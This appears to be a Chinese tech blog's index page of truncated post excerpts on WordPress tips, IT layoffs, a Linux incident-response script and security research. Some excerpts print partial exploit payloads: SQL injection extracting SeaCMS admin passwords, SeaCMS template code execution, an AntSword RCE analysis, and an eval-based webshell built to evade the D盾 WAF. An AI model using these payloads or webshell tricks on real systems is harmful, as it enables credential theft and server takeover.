LinuxCheck介绍 LinuxCheck是一个linux信息搜集小脚本，主要用于应急响应，在Debian或Centos下都可使用，功能： 信息搜集（端口、网络、用户信息、登陆信息，iptables、各种环境变量或配置文件等）异常检...

引言 由于近期前端抽不出资源，博主最近接手一个前端项目的代码维护工作。拿到手一看，一脸懵逼，和博主当年所学的jsp开发方式、利用ajax来请求数据的单页面开发方式完全不同。然而火坑已经跳下，只能硬着头...

体面光鲜，年薪百万的互联网巨头中层管理者们正迎来一场关于“饭碗”的凛冬。 互联网又开始裁员了？  一直在优化。默默地。  裁掉那些人或部门之后，对互联网企业有啥影响？  没啥影响。  一边是裁员，清理...

把自定义字段修改成你的，执行SQL就行，记得务必先备份数据库 delete from wp_postmeta where meta_id in ( select * from ( select meta_id from wp_postmeta a where a.meta_key = '你的自定义字段' ...

WordPress自定义字段排序 根据自定义字段news_sort的数字字段从小到大进行排序 $args = array( 'post_type' => 'news', 'orderby' => array( 'meta_value_num'=>'ASC' //ASC OR DESC ), 'meta_key'=> 'new...

海洋CMS V8.7漏洞 payload /upload/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(password)from%20sea_admin))),@`%27` ...

海洋CMS v6.54漏洞 漏洞代码执行 Payload get： http://seacms.test/search.php POST： searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:let...

我从来就没想过有一天我会当上经理。  在畅想未来的时候，我会想当一名码农，直到我挣够了钱就考虑转行。我甚至考虑过完全不相关的事，比如开一家餐馆（当我开始按照 J. Kenji López-Alt 的食谱进行烹...

四天前爆出了第一个中国蚁剑RCE漏洞，今天再被挖出一个，github已经修复，各位git pull跟上。 漏洞分析 首先对蚁剑进行复测，发现分类目录处的XSS并没有被修复，可能因为过于鸡肋项目方忽略了。（不过需要...

在先知上看到了一个shell过D盾的思路，同样可用来过其它waf。 D盾扫描结果 以前的思路常规，就是定义一个变量b：$b='';为空，$b = null;，$b = "\n";然后变量a： $a = $_GET['1'];，eval($a.$b);...